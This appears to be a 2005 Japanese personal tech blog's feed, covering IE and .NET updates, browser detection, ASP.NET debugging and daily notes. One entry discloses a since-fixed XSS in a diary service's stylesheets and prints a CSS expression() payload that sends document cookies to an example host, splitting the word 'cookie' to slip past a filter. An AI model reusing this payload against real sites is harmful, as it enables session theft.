ぷろじぇくと、みすじら。 http://www.fastwave.gr.jp/diarysrv/misuzilla/ 沢渡 真雪 hourly age++; http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-1 2005-12-27 一応、毎年のことなので書いておかないと。

一応、毎年のことなので書いておかないと。

]]> JVN#93004125 BBSNote におけるクロスサイトスクリプティングの脆弱性 http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-2 2005-12-27 ふむ。

ふむ。

]]> はてなダイアリー日記 - スタイルシートにおけるXSS脆弱性の修正について http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-3 2005-12-27 hoshikuzuさんのとこから。ところからっていうか、問題を報告したのは私なのですが、直ったことは告げられていなかったので今日まで直ったことを知りませんでした(はてダ日記見てないし……)。 この問題を見つけたとき、いくつか試したのですが width: 1px というのは効くけど width: 1px というのは効きませんでした。何でも有効と言うわけでもなくて単位とか expression とかそういう一部のものだけという感じ。 もう直ってるので試したコードも書いておきます。 .calendar { top: expression(new Image().src='http://www.example.com/capture?'+document['c'+'ookie']); } cookieという文字列を削除するという処理がかかっているとは。まぁ、別にわざわざ取るコードにせずともスクリプトが動くことを示せればよかったのですが。 まぁなんにしても、危険なものを取り除いてして安全なものだけ利用できるようにするというのは難しいことだなーと改めて思ったのでした。

hoshikuzuさんのとこから。ところからっていうか、問題を報告したのは私なのですが、直ったことは告げられていなかったので今日まで直ったことを知りませんでした(はてダ日記見てないし……)。

この問題を見つけたとき、いくつか試したのですが width: 1px というのは効くけど width: 1px というのは効きませんでした。何でも有効と言うわけでもなくて単位とか expression とかそういう一部のものだけという感じ。

もう直ってるので試したコードも書いておきます。

.calendar {
  top: expression(new Image().src='http://www.example.com/capture?'+document['c'+'ookie']);
}

cookieという文字列を削除するという処理がかかっているとは。まぁ、別にわざわざ取るコードにせずともスクリプトが動くことを示せればよかったのですが。

まぁなんにしても、危険なものを取り除いてして安全なものだけ利用できるようにするというのは難しいことだなーと改めて思ったのでした。

]]> 視力 2.0 http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051223-1 2005-12-23 これからの時代は視力 2.0! ランドルト環(Cみたいなやつ)を使っているうちは視力 1.0らしいです。 たまたま「視力 2.0」というのを見て「あー、また2.0かー」とか素で思ってしまったのです。そーゆー時代なのですね。ちがうちがう。

これからの時代は視力 2.0!

ランドルト環(Cみたいなやつ)を使っているうちは視力 1.0らしいです。

たまたま「視力 2.0」というのを見て「あー、また2.0かー」とか素で思ってしまったのです。そーゆー時代なのですね。ちがうちがう。

]]> Microsoft .NET Framework 2.0 日本語 http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051215-1 2005-12-15 ダウンロードセンターに言語パッケージとSDKが登場。 SDKのインストールには先に再配布パッケージと言語パッケージのインストールが必要です。しばらく(数日中という意味ではない)すると日本語再配布パッケージが出るかも? x86再配布パッケージ, Language Package, SDK x64再配布パッケージ, Language Package, SDK IA64再配布パッケージ, Language Package, SDK

ダウンロードセンターに言語パッケージとSDKが登場。

SDKのインストールには先に再配布パッケージと言語パッケージのインストールが必要です。しばらく(数日中という意味ではない)すると日本語再配布パッケージが出るかも?

x86
再配布パッケージ, Language Package, SDK
x64
再配布パッケージ, Language Package, SDK
IA64
再配布パッケージ, Language Package, SDK
]]> Internet Explorer 用の累積的なセキュリティ更新プログラム (905915) (MS05-054) http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051215-2 2005-12-15 このアップデートなのですがWindows XP Professional x64 Editionについては次のようにあります。 注: x86 以外のオペレーティング システムのバージョンについての深刻度は、次の x86 オペレーティング システムのバージョンと同じです。 Windows XP Professional x64 Edition 上の Internet Explorer 6 の深刻度は、Internet Explorer 6 Service Pack 1 (Windows Server 2003 以前のすべてのサポートされているオペレーティング システムのバージョン) の深刻度と同じです。 Microsoft Windows Server 2003 for Itanium-based Systems および Windows Server 2003 x64 Edition 上の Internet Explorer 6 の深刻度は、Windows Server 2003 上の Internet Explorer 6 と同じです。 でもWindows Server 2003ベースなXP x64はWSvr 2k3と同じはずなのでは?とダウンロードを見たら… Windows XP x64 Edition 用 Internet Explorer のセキュリティ更新プログラム (KB905915) Windows Server 2003 x64 Edition 用 Internet Explorer のセキュリティ更新プログラム (KB905915) WindowsServer2003.WindowsXP-KB905915-x64-JPN.exeで同じファイルでした。もちろん同じファイルだからといって元々の影響も同じかどうかといえば別ですが。

このアップデートなのですがWindows XP Professional x64 Editionについては次のようにあります。

注: x86 以外のオペレーティング システムのバージョンについての深刻度は、次の x86 オペレーティング システムのバージョンと同じです。

  • Windows XP Professional x64 Edition 上の Internet Explorer 6 の深刻度は、Internet Explorer 6 Service Pack 1 (Windows Server 2003 以前のすべてのサポートされているオペレーティング システムのバージョン) の深刻度と同じです。
  • Microsoft Windows Server 2003 for Itanium-based Systems および Windows Server 2003 x64 Edition 上の Internet Explorer 6 の深刻度は、Windows Server 2003 上の Internet Explorer 6 と同じです。

でもWindows Server 2003ベースなXP x64はWSvr 2k3と同じはずなのでは?とダウンロードを見たら…

WindowsServer2003.WindowsXP-KB905915-x64-JPN.exeで同じファイルでした。もちろん同じファイルだからといって元々の影響も同じかどうかといえば別ですが。

]]> ToHeart2.exe http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051211-1 2005-12-11 ふと、ライブラリを配布するときに「このライブラリを動的・静的リンクを問わず利用した場合、ソフトウェアのソースコードを公開してはならない」というライセンスにしておいて、何も考えない開発者がうっかりGPLと混ぜて、さあ大変!というネタを思いついた。

ふと、ライブラリを配布するときに「このライブラリを動的・静的リンクを問わず利用した場合、ソフトウェアのソースコードを公開してはならない」というライセンスにしておいて、何も考えない開発者がうっかりGPLと混ぜて、さあ大変!というネタを思いついた。

]]> Gecko 系ブラウザの判別、 Safari やその派生ブラウザの判別 http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-1 2005-11-28 これら AppleWebKit 系ブラウザたちをひとまとめに判別する際、ぼくは "AppleWebKit" の文字列を見てます。ブラウザ判別の主用途は、レンダリングエンジンもしくは JavaScript エンジンの差異に前もって気付くためであり、その差異を生んでいるもの・包括するものは、やっぱり "AppleWebKit" だと思うので。 ふむむ、Safari系というかAppleWebKit系のブラウザもあったのですね。すっかり失念していました。 AppleWebKitを使った場合、Safariが無理やり埋め込まれるならいいけれど、そうではない場合にちょっと困ったことが起こるかもしれないですね。Safari の偽装を解く事は不可能ということは、強制的に埋め込まれるってことなのかな。

これら AppleWebKit 系ブラウザたちをひとまとめに判別する際、ぼくは "AppleWebKit" の文字列を見てます。ブラウザ判別の主用途は、レンダリングエンジンもしくは JavaScript エンジンの差異に前もって気付くためであり、その差異を生んでいるもの・包括するものは、やっぱり "AppleWebKit" だと思うので。

ふむむ、Safari系というかAppleWebKit系のブラウザもあったのですね。すっかり失念していました。

AppleWebKitを使った場合、Safariが無理やり埋め込まれるならいいけれど、そうではない場合にちょっと困ったことが起こるかもしれないですね。Safari の偽装を解く事は不可能ということは、強制的に埋め込まれるってことなのかな。

]]> だっしゅ http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-2 2005-11-28 ふと思って前屈ぐいっとやってみたら、さすがにマイナス40はないけれど、マイナス14ぐらい? 本当はまだまだできるです。あのフレーズを聴くたび6号さんが前屈している図が思い浮かびます。 黄色いバカンス使いすぎ! くるみ Verが好きです!

ふと思って前屈ぐいっとやってみたら、さすがにマイナス40はないけれど、マイナス14ぐらい? 本当はまだまだできるです。あのフレーズを聴くたび6号さんが前屈している図が思い浮かびます。

黄色いバカンス使いすぎ! くるみ Verが好きです!

]]> やっぱり http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-3 2005-11-28 頭の絵はそのままで。めんどくさいのです。 あと、フォントを指定したからなのかまこすてんのGecko系(Camino, Firefox)でガタガタになっていたのが直ってた。

頭の絵はそのままで。めんどくさいのです。

あと、フォントを指定したからなのかまこすてんのGecko系(Camino, Firefox)でガタガタになっていたのが直ってた。

]]> CDF http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-4 2005-11-28 だいぶ前からですがRSSと合わせて、(いい加減ながらも)CDFを生成しています。CDF使う!って人はどうぞ(/channel.cdf)。マジオススメ(ぼうよみ)

だいぶ前からですがRSSと合わせて、(いい加減ながらも)CDFを生成しています。CDF使う!って人はどうぞ(/channel.cdf)。マジオススメ(ぼうよみ)

]]> XP(x86)上で制限ユーザ(Users)としてログオンしてASP.NETをデバッグする。 http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-5 2005-11-28 普段はUsersとしてログオンしているのですが、この場合案外面倒ということがわかりました。結論から言うとローカルのAdministratorsに所属させてしまうかW2k3を仮想マシンに入れるかするのがよさそう。 まずローカルグループのVS DevelopersとDebugger Usersに入れればいいやー、とか思ったのですがそれではダメなのでした。 それだけだとプロジェクトを実行しようとしているときにエラーが発生しました : Web サーバーでデバッグを開始できません。アクセスが拒否されました。と怒られてしまうのです。これは、 aspnet_wp.exe は ASPNET ユーザで実行している アタッチを試みたユーザは ASPNET ユーザではない アタッチを試みたユーザは Administrators に所属していない(Administrators はログオンしてるユーザを関係なくアタッチできる) ということなのですが、まあ当たり前ですね。で、じゃあ aspnet_wp.exe の実行ユーザを変更しよーとか思うと Machine.config で processModel 要素あたりをいじることになるのです。 Machine.config で起動するユーザを指定するにはファイルに資格情報(いわゆるパスワード)を生で書くか、資格情報を保護した状態にして指定するかなのですが、パスワード生はいヤすぎですし、保護するのも面倒です(コマンド一回とはいえ超面倒くさがりなので)。というか、そもそも Machine.config とかいじりたくないのですよ! ちなみに各種資格情報(SQL Server接続文字列とかも含む)を暗号化して保護する方法はMSKBの ASP.NET ユーティリティを使用して資格情報およびセッション状態の接続文字列を暗号化する方法(329290) を参照のこと。 これがW2k3(もしくはWindows XP x64 Edition)のIIS 6なら、aspnet_wp.exe に相当する w3wp.exe をIISマネージャから簡単に適当なアカウントで実行できます。

普段はUsersとしてログオンしているのですが、この場合案外面倒ということがわかりました。結論から言うとローカルのAdministratorsに所属させてしまうかW2k3を仮想マシンに入れるかするのがよさそう。

まずローカルグループのVS DevelopersとDebugger Usersに入れればいいやー、とか思ったのですがそれではダメなのでした。

それだけだとプロジェクトを実行しようとしているときにエラーが発生しました : Web サーバーでデバッグを開始できません。アクセスが拒否されました。と怒られてしまうのです。これは、

  • aspnet_wp.exe は ASPNET ユーザで実行している
  • アタッチを試みたユーザは ASPNET ユーザではない
  • アタッチを試みたユーザは Administrators に所属していない(Administrators はログオンしてるユーザを関係なくアタッチできる)

ということなのですが、まあ当たり前ですね。で、じゃあ aspnet_wp.exe の実行ユーザを変更しよーとか思うと Machine.config で processModel 要素あたりをいじることになるのです。

Machine.config で起動するユーザを指定するにはファイルに資格情報(いわゆるパスワード)を生で書くか、資格情報を保護した状態にして指定するかなのですが、パスワード生はいヤすぎですし、保護するのも面倒です(コマンド一回とはいえ超面倒くさがりなので)。というか、そもそも Machine.config とかいじりたくないのですよ!

ちなみに各種資格情報(SQL Server接続文字列とかも含む)を暗号化して保護する方法はMSKBASP.NET ユーティリティを使用して資格情報およびセッション状態の接続文字列を暗号化する方法(329290) を参照のこと。

これがW2k3(もしくはWindows XP x64 Edition)のIIS 6なら、aspnet_wp.exe に相当する w3wp.exe をIISマネージャから簡単に適当なアカウントで実行できます。

]]>